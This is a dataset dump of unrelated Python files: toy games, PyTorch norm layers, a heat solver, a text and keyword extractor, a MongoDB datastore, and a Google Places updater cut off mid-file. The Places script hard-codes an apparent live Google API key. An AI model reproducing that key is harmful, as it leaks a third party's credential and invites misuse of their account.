+{"seq_id":"13400386","text":"\ncar_status = 'stop'\nprint('Hello, welcome to Car Game, you may input \"help\" to check out how '\n 'to play')\nwhile True:\n userinput = input('>')\n userinput = userinput.lower()\n if(userinput == 'help'):\n print('''\n Start - start the car\n Stop - stop the car\n Quit - quit this gamn\n help - show this message\n ''')\n elif(userinput == 'start'):\n if(car_status == 'stop'):\n print(' The car is ready .... set ....Go!')\n car_status = 'start'\n else:\n print(' The car had started already')\n elif(userinput == 'stop'):\n if(car_status == 'start'):\n print(' Alright, the car stops now')\n car_status = 'stop'\n else:\n print(' The car had stopped already')\n elif(userinput == 'quit'):\n print(' Bye~ ')\n break\n else:\n print(\" Sorry, I don't understand.\")\n","sub_path":"Scripts/practise/cargame.py","file_name":"cargame.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131182934","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n__all__ = [\n \"FrozenBatchNorm2d\",\n \"L2Norm\",\n \"get_norm\",\n]\n\n\nclass FrozenBatchNorm2d(nn.Module):\n _version = 3\n\n def __init__(self, num_features, eps=1e-5):\n super().__init__()\n\n self.num_features = num_features\n self.eps = eps\n self.register_buffer(\"weight\", torch.ones(num_features))\n self.register_buffer(\"bias\", torch.zeros(num_features))\n self.register_buffer(\"running_mean\", torch.zeros(num_features))\n self.register_buffer(\"running_var\", torch.ones(num_features) - eps)\n\n def forward(self, x):\n if x.requires_grad:\n scale = self.weight * (self.running_var + self.eps).rsqrt()\n bias = self.bias - self.running_mean * scale\n scale = scale.reshape(1, -1, 1, 1)\n bias = bias.reshape(1, -1, 1, 1)\n return x * scale + bias\n else:\n return F.batch_norm(\n x,\n self.running_mean,\n self.running_var,\n self.weight,\n self.bias,\n training=False,\n eps=self.eps,\n )\n\n def _load_from_state_dict(\n self,\n state_dict,\n prefix,\n local_metadata,\n strict,\n missing_keys,\n unexpected_keys,\n error_msgs\n ):\n version = local_metadata.get(\"version\", None)\n\n if version is None or version < 2:\n if prefix + \"running_mean\" not in state_dict:\n state_dict[prefix + \"running_mean\"] = torch.zeros_like(self.running_mean)\n if prefix + \"running_var\" not in state_dict:\n state_dict[prefix + \"running_var\"] = torch.ones_like(self.running_var)\n\n if version is not None and version < 3:\n logger = logging.getLogger(__name__)\n logger.info(\"FrozenBatchNorm {} is upgraded to version 3.\".format(prefix.rstrip(\".\")))\n state_dict[prefix + \"running_var\"] -= self.eps\n\n super()._load_from_state_dict(\n state_dict,\n prefix,\n local_metadata,\n strict,\n missing_keys,\n unexpected_keys,\n error_msgs\n )\n\n def __repr__(self):\n return f\"FrozenBatchNorm2d(num_features={self.num_features}, eps={self.eps})\"\n\n @classmethod\n def convert_frozen_batchnorm(cls, module):\n bn_module = nn.modules.batchnorm\n bn_module = (bn_module.BatchNorm2d, bn_module.SyncBatchNorm)\n res = module\n if isinstance(module, bn_module):\n res = cls(module.num_features)\n if module.affine:\n res.weight.data = module.weight.data.clone().detach()\n res.bias.data = module.bias.data.clone().detach()\n res.running_mean.data = module.running_mean.data\n res.running_var.data = module.running_var.data\n res.eps = module.eps\n else:\n for name, child in module.named_children():\n new_child = cls.convert_frozen_batchnorm(child)\n if new_child is not child:\n res.add_module(name, new_child)\n return res\n\n\nclass L2Norm(nn.Module):\n def __init__(self, n_dims, scale=20.0, eps=1e-10):\n super().__init__()\n\n self.n_dims = n_dims\n self.weight = nn.Parameter(torch.Tensor(self.n_dims))\n self.eps = eps\n\n nn.init.constant_(self.weight, scale)\n\n def forward(self, x):\n x_float = x.float()\n norm = x_float.pow(2).sum(1, keepdim=True).sqrt() + self.eps\n return (self.weight[None, :, None, None].float().expand_as(x_float) * x_float / norm).type_as(x)\n\n\ndef get_norm(norm, out_channels, **kwargs):\n if isinstance(norm, str):\n if len(norm) == 0:\n return None\n eps = kwargs.get(\"eps\", 1e-5)\n momentum = kwargs.get(\"momentum\", 0.1)\n affine = kwargs.get(\"affine\", True)\n track_running_stats = kwargs.get(\"track_running_stats\", True)\n norm = {\n \"BN\": lambda x: nn.BatchNorm2d(x, eps, momentum, affine, track_running_stats),\n \"GN\": lambda x: nn.GroupNorm(32, x, eps, affine),\n \"FrozenBN\": lambda x: FrozenBatchNorm2d(x, eps),\n }[norm]\n return norm(out_channels)\n","sub_path":"tkdet/layers/batch_norm.py","file_name":"batch_norm.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"16078538","text":"import bisect\nimport sys\n\nhaystack=[1,4,5,6,8,12,15,20,21,23,23,26,29,30]\nneedeles=[0,1,2,5,8,10,22,23,29,30,31]\n\nrow_fmt='{0:2d} @ {1:2d} {2}{0:<2d}'\n\ndef demo(bisect_fn):\n for needle in reversed(needeles):\n position=bisect_fn(haystack,needle)\n offset=position*' |'\n print(row_fmt.format(needle,position,offset))\n \n#if __name__=='__main__':\n# if sys.argv[-1]=='left':\n# bisect_fn=bisect.bisect_left#如果相等会被放置到相等元素的前面\n# else:\n# bisect_fn=bisect.bisect#否则默认放置到相等元素后面\n# print('demo:',bisect_fn.__name__)\n# print('haystack ->',' '.join('%2d' % n for n in haystack))\n# demo(bisect_fn)\n\ndef grade(score,breakpoints=[60,70,80,90],grades='FDCBA'):\n i=bisect.bisect(breakpoints,score)#二分查找,查找之前必须保证是有序序列\n return grades[i]\n\nprint([grade(score) for score in [33,99,77,70,89,90,100]])","sub_path":"pythonproject/流畅的python/第二章--序列构成的数组/2.8.1用bitsect来搜索.py","file_name":"2.8.1用bitsect来搜索.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164240716","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 11 15:49:31 2019\n\n@author: Arvid\n\"\"\"\nfrom scipy import *\nfrom numpy import *\nfrom matplotlib.pyplot import *\nfrom scipy.linalg import lu_factor, lu_solve\n\nfrom Problem import Problem\n\n\nclass smallRoomHeatSolver():\n \n def __init__(self, interface_dir, interface_vals, problem, room):\n # geom=(1,1), heater=40, normal_wall=15):\n #super().__init__(problem)\n \n self.interface_dir = interface_dir\n self.interface_vals = interface_vals\n #Change with global geometry\n self.x_len = problem.geometry[room][0]\n self.y_len = problem.geometry[room][1]\n self.dx = problem.dx\n self.heater = problem.heater\n self.normal_wall = problem.wall\n self.n_rows = round(self.x_len/self.dx) -1 # Defines the number of rows in the coordinate mesh.\n self.n_cols = round(self.y_len/self.dx) # Defines the number of columns in the coordinate mesh. \n self.size = (self.n_rows, self.n_cols)\n self.N_elements = self.n_rows*self.n_cols # Number of points in which to calculate u \n BC, neu_ind = self._make_boundaries()\n self.BC = BC\n self.neu_ind = neu_ind\n self.A = self._make_matrix()\n lu, piv = lu_factor(self.A)\n self.lu = lu\n self.piv = piv\n self.solution = None\n \n def _make_boundaries(self):\n \n BC_W = zeros(self.size)\n BC_E = zeros(self.size)\n BC_N = zeros(self.size)\n BC_S = zeros(self.size)\n BC_N[0,0:] = self.normal_wall\n BC_S[-1,0:] = self.normal_wall\n \n if self.interface_dir == 'west':\n BC_E[:,-1] = self.heater/(self.dx**2)\n BC_W[:,0] = self.interface_vals/self.dx\n neumann_ind = nonzero(BC_W.reshape(self.N_elements))\n elif self.interface_dir == 'east':\n BC_E[:,-1] = self.interface_vals/self.dx\n BC_W[:,0] = self.heater/self.dx**2\n neumann_ind = nonzero(BC_E.reshape(self.N_elements))\n BC_tot = BC_W + BC_E + BC_N/self.dx**2 + BC_S/self.dx**2\n \n BC_tot = BC_tot.reshape(self.size[0]*self.size[1])\n return BC_tot, neumann_ind\n \n def _update_boundaries(self, interface_vals):\n self.interface_vals = interface_vals\n BC, neu = self._make_boundaries()\n self.BC = -BC\n \n def _make_matrix(self):\n A = (diag(-4*ones(self.N_elements))\n + diag(ones(self.N_elements-1), -1)\n + diag(ones(self.N_elements-1), 1)\n + diag(ones(self.N_elements-self.n_cols), self.n_cols)\n + diag(ones(self.N_elements-self.n_cols), -self.n_cols))\n for ind in self.neu_ind:\n A[ind,ind] = -3\n \n for i in range(self.n_cols-1, self.N_elements-1, self.n_cols):\n A[i, i+1] = 0\n for i in range(self.n_cols, self.N_elements-1, self.n_cols):\n A[i,i-1] = 0\n return A*(1/self.dx**2)\n \n def solve_system(self, interface_vals):\n self._update_boundaries(interface_vals)\n u = lu_solve((self.lu, self.piv), self.BC)\n mesh_vals = u.reshape(self.n_rows,self.n_cols)\n if self.interface_dir == 'east':\n interface_vals = mesh_vals[:,-1]\n elif self.interface_dir == 'west':\n interface_vals = mesh_vals[:,0]\n self.solution = u \n return u, interface_vals\n \n def getMatrix(self):\n room = zeros((self.n_rows+2, self.n_cols+1))\n if self.interface_dir == 'east':\n room[1:-1,0:-1] = flip(self.solution.reshape(self.size)) #Might have flipped to much heh (mirror flip?)\n room[0, :] = self.normal_wall*ones(self.n_cols+1)\n room[:, -1] = self.heater*ones(self.n_rows+2)\n room[-1, :] = self.normal_wall*ones(self.n_cols+1) \n elif self.interface_dir == 'west':\n room[1:-1, 1:] = flip(self.solution.reshape(self.size)) #Might have flipped to much heh (mirror flip?)\n room[0,:] = room[-1,:] = self.normal_wall*ones(self.n_cols+1)\n room[:, 0] = self.heater*ones(self.n_rows+2)\n print('Complete room is: {}'.format(room))\n return room\n \n \nif __name__ == '__main__':\n p = Problem(1/4)\n print(p.geometry)\n interface_vals = array([20,20,20])\n s = smallRoomHeatSolver('east', interface_vals, p, 'room1')\n #BC, neumann_ind = s._make_boundaries()\n A=s._make_matrix()\n s.solve_system(interface_vals)\n print(s.getMatrix())\n ","sub_path":"Project3/Arvid/smallRoomHeatSolver.py","file_name":"smallRoomHeatSolver.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"150032955","text":"# -*- coding: utf-8 -*- \nfrom tika import parser\nfrom pptx import Presentation\nimport olefile\nimport docx2txt\nfrom krwordrank.hangle import normalize\nfrom krwordrank.word import KRWordRank\n\n\n# pdf to txt\ndef pdf_to_txt(path):\n pdf_path = path\n raw_pdf = parser.from_file(pdf_path) \n result = raw_pdf['content'] \n result = result.strip()\n #print(result)\n return result\n\n\n# ppt to txt ---> 리스트에 txt 박스 단위로 반환 \ndef ppt_to_txt(path):\n ppt_path = Presentation(path)\n result = []\n for slide in ppt_path.slides:\n for shape in slide.shapes:\n if not shape.has_text_frame:\n continue\n for paragraph in shape.text_frame.paragraphs:\n result.append(paragraph.text)\n #print(result)\n return result\n\n\n# hwp to txt ---> Prvtxt만 가능\n# https://luji.tistory.com/18\ndef hwp_to_txt(path):\n hwp_file = olefile.OleFileIO(path)\n hwp_txt = hwp_file.openstream('Prvtext').read()\n result = hwp_txt.decode('UTF=16')\n #print (result)\n return result\n\n\n# word to txt\ndef word_to_txt(path):\n result = docx2txt.process(path)\n #print(result)\n return result\n\n\n# keyword extraction from txt\n# https://lovit.github.io/nlp/2018/04/16/krwordrank/ \n\ndef keyword_extraction(path):\n with open(path, 'r') as f:\n list_file = []\n for line in f:\n list_file.append(line)\n\n texts = list_file\n texts = [normalize(text, english=True, number=True) for text in texts]\n\n wordrank_extractor = KRWordRank(\n min_count = 5, # 단어의 최소 출현 빈도수 (그래프 생성 시)\n max_length = 10, # 단어의 최대 길이\n verbose = True\n )\n\n beta = 0.85 # PageRank의 decaying factor beta\n max_iter = 10\n\n keywords, rank, graph = wordrank_extractor.extract(texts, beta, max_iter)\n\n for word, r in sorted(keywords.items(), key=lambda x:x[1], reverse=True)[:5]: \n print('%s' % (word))\n #print('%8s:\\t%.4f' % (word, r))","sub_path":"keyword extraction/read_file.py","file_name":"read_file.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"613549941","text":"import haravasto\nfrom random import randint\nimport time\n\n\ntila = {\n\t\"kentta\": None,\n\t\"nakyvakentta\": None,\n\t\"liput\": None,\n\t\"miinat\": None,\n\t\"aloitus\": None\n}\n\ndef luo_kentta():\n\t\"\"\"Luo kentän käyttäjän antamien asetusten mukaan\"\"\"\n\tleveys, korkeus, maara = kysy_asetukset()\n\tprint(\"Hiiren vasen aukaisee ruutuja, hiiren oikea asettaa lipun\\nPeli päättyy, kun kaikkien miinojen paikalle on asetettu lippu\")\n\n\tnakyvakentta = []\n\tkentta = []\n\tfor rivi in range(korkeus):\n\t\tkentta.append([])\n\t\tnakyvakentta.append([])\n\t\tfor sarake in range(leveys):\n\t\t\tkentta[-1].append(\" \")\n\t\t\tnakyvakentta[-1].append(\" \")\n\ttila[\"liput\"] = []\n\ttila[\"nakyvakentta\"] = nakyvakentta\n\ttila[\"kentta\"] = kentta\n\tmiinoita(kentta, maara)\n\tnumeroi_ruudut(kentta)\n\ndef kysy_asetukset():\n\t\"\"\"Kysyy käyttäjältä asetukset ja tarkastaa ne\"\"\"\n\tprint(\"Vaikeusasteet ovat Micro$oft Minesweeperin mukaiset ja näin ollen vaikuttavat kentän kokoon, sekä miinojen määrään\\n\")\n\twhile True:\n\t\ttry:\t\n\t\t\tprint(\"Valitse 1. jos haluat pelata helpolla vaikeusasteella\\nValitse 2. jos haluat pelata keskivaikealla vaikeusasteella\\nValitse 3. jos haluat pelata vaikeimmalla vaikeusasteella\")\n\t\t\tprint(\"Valitse 4. jos haluat päättää asetukset itse\\n\")\n\t\t\tvalinta = int(input(\"Syötä valintasi: \"))\n\t\t\tif valinta == 1:\n\t\t\t\tleveys = 8\n\t\t\t\tkorkeus = 8\n\t\t\t\tmaara = 10\n\t\t\t\treturn leveys, korkeus, maara\n\t\t\telif valinta == 2:\n\t\t\t\tleveys = 16\n\t\t\t\tkorkeus = 16\n\t\t\t\tmaara = 40\n\t\t\t\treturn leveys, korkeus, maara\n\t\t\telif valinta == 3:\n\t\t\t\tleveys = 24\n\t\t\t\tkorkeus = 24\n\t\t\t\tmaara = 99\n\t\t\t\treturn leveys, korkeus, maara\n\t\t\telif valinta == 4:\n\t\t\t\tleveys = int(input(\"Syötä kentän leveys kokonaislukuna: \"))\n\t\t\t\tkorkeus = int(input(\"Syötä kentän korkeus kokonaislukuna: \"))\n\t\t\t\tmaara = int(input(\"Syötä miinojen lukumäärä: \"))\n\t\t\t\tif leveys < 1 or korkeus < 1 or maara > leveys*korkeus:\n\t\t\t\t\tprint(\"Kenttä on liian pieni tai miinoja on enemmän kuin ruutuja.\\n\")\n\t\t\t\telse:\n\t\t\t\t\treturn leveys, korkeus, maara\n\t\t\telse:\n\t\t\t\tprint(\"Virheellinen valinta.\\n\")\n\t\texcept ValueError:\n\t\t\tprint(\"Syötä arvot kokonaislukuina\\n\")\n\ndef miinoita(kentta, maara):\n\t\"\"\"Asettaa kentällä N kpl miinoja satunnaisiin paikkoihin.\"\"\"\n\tmiinat = []\n\tfor i in range(maara):\n\t\t\tx = randint(0, len(kentta) - 1)\n\t\t\ty = randint(0, len(kentta) - 1)\n\t\t\tif kentta[x][y] != \"x\":\n\t\t\t\tkentta[x][y] = \"x\"\n\t\t\t\tmiinat.append((x, y))\n\t# Asettaa kentän tiedot kirjastoon\n\ttila[\"miinat\"] = miinat\n\ttila[\"kentta\"] = kentta\n\ndef numeroi_ruudut(kentta): \n\t\"\"\"Muuttaa ruutujen arvot vastaamaan viereisten miinojen määrää\"\"\"\n\tfor rivinro, rivi in enumerate(kentta):\n\t\tfor sarakenro, sarake in enumerate(rivi):\n\t\t\tif sarake != \"x\":\n\t\t\t\t# Ottaa naapureiden arvot\n\t\t\t\tarvot = [kentta[r][s] for r, s in etsi_naapurit(rivinro, sarakenro)]\n\t\t\t\t# Laskee kuinka monta on miinoja\n\t\t\t\tif arvot.count(\"x\") > 0:\n\t\t\t\t\tkentta[rivinro][sarakenro] = str(arvot.count(\"x\"))\n\t\t\t\telse:\n\t\t\t\t\tkentta[rivinro][sarakenro] = \"0\"\n\t# Asettaa ruutujen numeroarvot kirjastoon\n\ttila[\"kentta\"] = kentta\n\ndef etsi_naapurit(x, y):\n\t\"\"\"Etsii ruudun naapurit ja palauttaa ne\"\"\"\n\tleveys = len(tila[\"kentta\"])\n\tkorkeus = len(tila[\"kentta\"][0])\n\tnaapurit = []\n\tfor nx in range(min(max(x-1, 0), leveys), min(max(x+2, 0), leveys)):\n\t\tfor ny in range(min(max(y-1, 0), korkeus), min(max(y+2, 0), korkeus)):\n\t\t\t\tnaapurit.append((nx, ny))\n\treturn naapurit\n\ndef tulvataytto(x, y, tarkastettu=[]):\n\t\"\"\"Merkitsee kentällä olevat tuntemattomat alueet turvalliseksi siten, että täyttö aloitetaan annetusta x, y -pisteestä.\"\"\"\n\tnaapurit = etsi_naapurit(x, y)\n\tfor x, y in naapurit:\n\t\tif (x, y) not in tarkastettu:\n\t\t\ttarkastettu.append((x, y))\n\t\t\tif tila[\"kentta\"][x][y] != \"x\" and tila[\"nakyvakentta\"][x][y] != \"f\":\n\t\t\t\ttila[\"nakyvakentta\"][x][y] = tila[\"kentta\"][x][y]\n\n\t\t\tif tila[\"kentta\"][x][y] == \"0\":\n\t\t\t\ttulvataytto(x, y)\n\n\ndef tarkista_voitto(x, y):\n\t#tarkistaa onko liput samoissa paikoissa kuin miinat\n\tif set(tila[\"liput\"]) == set(tila[\"miinat\"]):\n\t\tprint(\"Voitit pelin :)\")\n\t\tprint(\"Aikaa kului: {:.2f} sekunttia\".format(lopeta_kello()))\n\t\tpiirra_kentta()\n\ndef tarkista_havio(x, y):\n\t#tarkistaa onko painetussa kohdassa miina\n\tif tila[\"kentta\"][x][y] == \"x\":\n\t\tprint(\"Hävisit pelin :(\")\n\t\tprint(\"Aikaa kului: {:.2f} sekunttia\".format(lopeta_kello()))\n\t\ttila[\"nakyvakentta\"] = tila[\"kentta\"]\n\t\tpiirra_kentta()\n\ndef avaa_ruutu(x, y):\n\ttarkista_havio(x, y)\n\t#jos on lippu, poistaa sen\n\tif (x, y) == tila[\"liput\"]:\n\t\ttila[\"liput\"].remove((x, y))\n\t\t#näytä ruutu\n\t\ttila[\"nakyvakentta\"][x][y] = tila[\"kentta\"][x][y] \n\t\tpiirra_kentta()\n\n\tif tila[\"nakyvakentta\"][x][y] == \" \":\n\t\tif int(tila[\"kentta\"][x][y]) > 0:\n\t\t\ttila[\"nakyvakentta\"][x][y] = tila[\"kentta\"][x][y] \n\t\tif tila[\"kentta\"][x][y] == \"0\":\n\t\t\ttulvataytto(x, y)\n\t\tpiirra_kentta()\n\n\ndef aseta_lippu(x, y):\n\t# Tarkistaa onko ruutu tyhjä\n\tif tila[\"nakyvakentta\"][x][y] == \" \":\n\t\ttila[\"nakyvakentta\"][x][y] = \"f\"\n\t\ttila[\"liput\"].append((x, y))\n\t\ttarkista_voitto(x, y)\n\t# Poistaa lipun\n\telif tila[\"nakyvakentta\"][x][y] == \"f\":\n\t\ttila[\"nakyvakentta\"][x][y] = \" \"\n\t\ttila[\"liput\"].remove((x, y))\n\t\tprint(tila[\"liput\"])\n\telse:\n\t\tprint(\"Ei voi asettaa lippua\")\n\n\tpiirra_kentta()\n\ndef aloita_kello():\n\t# Aloittaa pelin kulkua mittaavan sekunttikellon\n\ttila[\"aloitus\"] = time.time()\n\ndef lopeta_kello():\n\t# Lopettaa pelin kulkua mittaavan sekunttikellon\n\tloppuaika = time.time()\n\ttotal = loppuaika - tila[\"aloitus\"]\n\treturn total\n\ndef hiiri_kasittelija(x, y, nappi, muokkausnapit):\n\t\"\"\"Tätä funktiota kutsutaan kun käyttäjä klikkaa sovellusikkunaa hiirellä.\"\"\"\n\tx = int(x / 40)\n\ty = int(y / 40)\n\tif nappi == haravasto.HIIRI_VASEN:\n\t\tavaa_ruutu(x, y)\n\telif nappi == haravasto.HIIRI_OIKEA:\n\t\taseta_lippu(x, y)\n\ndef piirra_kentta(): \n\t\"\"\"Käsittelijäfunktio, joka piirtää kaksiulotteisena listana kuvatun miinakentän ruudut näkyviin peli-ikkunaan.\n\tFunktiota kutsutaan aina kun pelimoottori pyytää ruudun näkymän päivitystä.\"\"\"\n\tharavasto.tyhjaa_ikkuna()\n\tharavasto.piirra_tausta()\n\tharavasto.aloita_ruutujen_piirto()\n\tfor x in range(len(tila[\"nakyvakentta\"])):\n\t\tfor y in range(len(tila[\"nakyvakentta\"][0])):\n\t\t\t\tharavasto.lisaa_piirrettava_ruutu(tila[\"nakyvakentta\"][x][y], x * 40, y * 40)\n\tharavasto.piirra_ruudut()\n\ndef main():\n\tluo_kentta()\n\tharavasto.lataa_kuvat(\"spritet\")\n\tharavasto.luo_ikkuna(len(tila[\"nakyvakentta\"] * 40), len(tila[\"nakyvakentta\"][0] * 40))\n\tharavasto.aseta_piirto_kasittelija(piirra_kentta)\n\tharavasto.aseta_hiiri_kasittelija(hiiri_kasittelija)\n\taloita_kello()\n\tharavasto.aloita()\nif __name__ == \"__main__\":\n\tmain()","sub_path":"mh.py","file_name":"mh.py","file_ext":"py","file_size_in_byte":6498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"563388154","text":"from aws_xray_sdk.core import xray_recorder\nfrom config import get_mongo_collection\nfrom models.user_stats import UserStats\nfrom fathomapi.utils.exceptions import InvalidSchemaException\n\n\nclass UserStatsDatastore(object):\n def __init__(self, mongo_collection='athletestats'):\n self.mongo_collection = mongo_collection\n\n @xray_recorder.capture('datastore.UserStatsDatastore.get')\n def get(self, athlete_id):\n \"\"\"\n :param athlete_id: uuid\n :return:\n \"\"\"\n return self._query_mongodb(athlete_id)\n\n def put(self, items):\n if not isinstance(items, list):\n items = [items]\n try:\n for item in items:\n self._put_mongodb(item)\n except Exception as e:\n raise e\n\n def delete(self, athlete_id=None):\n if athlete_id is None:\n raise InvalidSchemaException(\"Need to provide athlete_id to delete\")\n self._delete_mongodb(athlete_id=athlete_id)\n\n @xray_recorder.capture('datastore.UserStatsDatastore._query_mongodb')\n def _query_mongodb(self, athlete_id):\n mongo_collection = get_mongo_collection(self.mongo_collection)\n if isinstance(athlete_id, list):\n query = {'athlete_id': {'$in': athlete_id}}\n mongo_results = mongo_collection.find(query)\n athlete_stats_list = []\n for mongo_result in mongo_results:\n athlete_stats_list.append(UserStats.json_deserialise(mongo_result))\n\n return athlete_stats_list\n else:\n query = {'athlete_id': athlete_id}\n mongo_result = mongo_collection.find_one(query)\n\n if mongo_result is not None:\n return UserStats.json_deserialise(mongo_result)\n else:\n return None\n\n @xray_recorder.capture('datastore.UserStatsDatastore._put_mongodb')\n def _put_mongodb(self, item):\n item = item.json_serialise()\n\n mongo_collection = get_mongo_collection(self.mongo_collection)\n query = {'athlete_id': item['athlete_id']}\n mongo_collection.replace_one(query, item, upsert=True)\n\n @xray_recorder.capture('datastore.UserStatsDatastore._delete_mongodb')\n def _delete_mongodb(self, athlete_id):\n mongo_collection = get_mongo_collection(self.mongo_collection)\n query = {}\n if isinstance(athlete_id, list):\n query['athlete_id'] = {'$in': athlete_id}\n else:\n query['athlete_id'] = athlete_id\n if len(query) > 0:\n mongo_collection.delete_many(query)","sub_path":"apigateway/datastores/user_stats_datastore.py","file_name":"user_stats_datastore.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330869600","text":"\"\"\"\nThe Hamming distance between two integers is the number of positions at which the corresponding bits are different.\nGiven two integers x and y, calculate the Hamming distance.\n\nNote:\n0 ≤ x, y < 231.\n\nExample:\nInput: x = 1, y = 4\n\nOutput: 2\nExplanation:\n1 (0 0 0 1)\n4 (0 1 0 0)\n ↑ ↑\n\nThe above arrows point to positions where the corresponding bits are different.\n\"\"\"\n\nimport os\nimport sys\n\ndef main():\n x = 1\n y = 4\n\n tmp = 0\n num1 = 0\n num2 = 0\n\n while(0 <= x and y < 2**31):\n num1 = x ^ y\n print(\"num1:\",num1)\n while(num1 != 0):\n tmp += 1\n num2 = num1 -1\n num1 &= num2\n print(\"tmp:\",tmp,\"num1:\",num1,\"num2:\",num2)\n print(\"tmp:\",tmp)\n return tmp\n \nif __name__ == '__main__':\n main()\n ","sub_path":"算法_Python/汉明距离.py","file_name":"汉明距离.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"179836184","text":"#!/usr/bin/python3\n\nimport urllib.request\nimport json\nfrom datetime import time\n\nfrom django.db.models.query import QuerySet\nfrom django.db.models import Q\n\nfrom osg.models import Attraction, Service\nfrom platour.models import Phone, TypeOfPhone, SubtypeOfExternalReference, ExternalReference, OpeningHour\nfrom platour.functions import print_error, print_log, LOG_LEVEL_DEBUG, LOG_LEVEL_INFO, LOG_LEVEL_ERROR, LOG_LEVEL_WARNING\n\ngoogle_place_key = \"AIzaSyC6zYeRdM3nMIhCp3Cy_VadKHBkbsFQkrk\"\nlanguage_pt_br = 'pt-BR'\nregion_br = 'br'\ngoogle_place_url = \"https://maps.googleapis.com/maps/api/place/details/json?placeid={placeid}&key={key}&language={language}®ion={region}\"\ngoogle_placeid_search_url = \"https://maps.googleapis.com/maps/api/place/findplacefromtext/json?key={key}&inputtype=textquery&{input}\"\nHTML_HEADER = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'}\nTIMEOUT_REQUEST=60\n\nPHONE_GOOGLE = 'Google'\nWEBSITE_GOOGLE_SUBT = 'Google'\nWEBSITE_GOOGLE_TYPE = 'Site'\n\ndef get_json(placeid, language=language_pt_br, region=region_br):\n json_url = google_place_url.format(placeid=placeid, key=google_place_key, language=language, region=region)\n print_log(LOG_LEVEL_DEBUG, \"loading JSON URL '{0}'\".format(json_url))\n try:\n request = urllib.request.Request(json_url, None, HTML_HEADER)\n with urllib.request.urlopen(request, timeout=TIMEOUT_REQUEST) as url:\n data = json.loads(url.read().decode())\n print_log(LOG_LEVEL_DEBUG, \"success loading JSON URL '{0}'\".format(json_url))\n return data\n except:\n print_error(\"failed loading JSON URL '{0}'\".format(json_url))\n return\n\ndef get_placeid(establishment, force_reload=False):\n if type(establishment) not in [Attraction, Service]:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment {0} of type '{1}'\".format(establishment, type(establishment)))\n return None\n\n if force_reload == False:\n placeid = establishment.google_placeid\n if placeid:\n return placeid\n else:\n print_log(LOG_LEVEL_WARNING, \"establishment '{0}' has no google_placeid\".format(establishment))\n\n name = establishment.name\n if not name:\n print_log(LOG_LEVEL_ERROR, \"establishment of id {0} name not found, blank or empty - how is that possible?!\".format(establishment.id))\n return None\n location = establishment.locations.first().name or \"\"\n if not location:\n print_log(LOG_LEVEL_WARNING, \"establishment '{0}' location not found\".format(establishment))\n\n place = \"{0},{1}\".format(name.replace(' ', '+'), location.replace(' ', '+'))\n input_param = urllib.parse.urlencode({'input': place}, 'utf-8')\n json_url = google_placeid_search_url.format(key=google_place_key, input=input_param)\n print_log(LOG_LEVEL_DEBUG, \"loading JSON URL '{0}'\".format(json_url))\n\n try:\n request = urllib.request.Request(json_url, None, HTML_HEADER)\n with urllib.request.urlopen(request, timeout=TIMEOUT_REQUEST) as url:\n data = json.loads(url.read().decode())\n print_log(LOG_LEVEL_DEBUG, \"success loading JSON URL '{0}'\".format(json_url))\n except:\n print_error(\"failed loading JSON URL '{0}'\".format(json_url))\n return None\n\n try:\n candidates = data.get('candidates', None)\n if candidates:\n placeid = candidates[0].get('place_id', None)\n if not placeid:\n print_error(\"failed getting JSON key 'place_id' from URL '{0}'\".format(json_url))\n return None\n print_log(LOG_LEVEL_DEBUG, \"got placeid '{0}' of establishment '{1}'\".format(placeid, establishment))\n return placeid\n except:\n print_error(\"failed getting JSON key 'place_id' from URL '{0}'\".format(json_url))\n return None\n\ndef get_address(json_data):\n return json_data['result'].get('formatted_address', None)\n\ndef get_phone(json_data):\n return json_data['result'].get('international_phone_number', None)\n\ndef get_latitude(json_data):\n return str(json_data['result']['geometry']['location']['lat'])\n\ndef get_longitude(json_data):\n return str(json_data['result']['geometry']['location']['lng'])\n\ndef get_name(json_data):\n return json_data['result'].get('name', None)\n\ndef get_rating(json_data):\n return str(json_data['result'].get('rating', None))\n\ndef get_permanently_closed(json_data):\n try:\n permanently_closed = json_data['result'].get('permanently_closed', None)\n if permanently_closed == 'true':\n return True\n else:\n return False\n except KeyError as e:\n return False\n\ndef get_website(json_data):\n return json_data['result'].get('website', None)\n\ndef get_opening_hours(json_data):\n opening_hours = json_data['result'].get('opening_hours', None)\n if opening_hours:\n return opening_hours.get('periods', None)\n else:\n return None\n\ndef update(establishment):\n if establishment == None:\n print_log(LOG_LEVEL_WARNING, \"empty establishment\")\n return\n\n if type(establishment) not in [Attraction, Service]:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment {0} of type '{1}'\".format(establishment, type(establishment)))\n return\n\n print_log(LOG_LEVEL_INFO, \"started updating establishment '{0}'\".format(establishment))\n\n has_change = False\n\n ####################\n # Updating placeid #\n ####################\n data = placeid = get_placeid(establishment)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get a placeid for establishment '{0}'\".format(establishment))\n return\n else:\n data_old = establishment.google_placeid\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new Google placeid: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.google_placeid = data\n has_change = True\n\n ################\n # Getting JSON #\n ################\n e_json = get_json(placeid)\n if e_json == None:\n print_log(LOG_LEVEL_ERROR, \"can't get 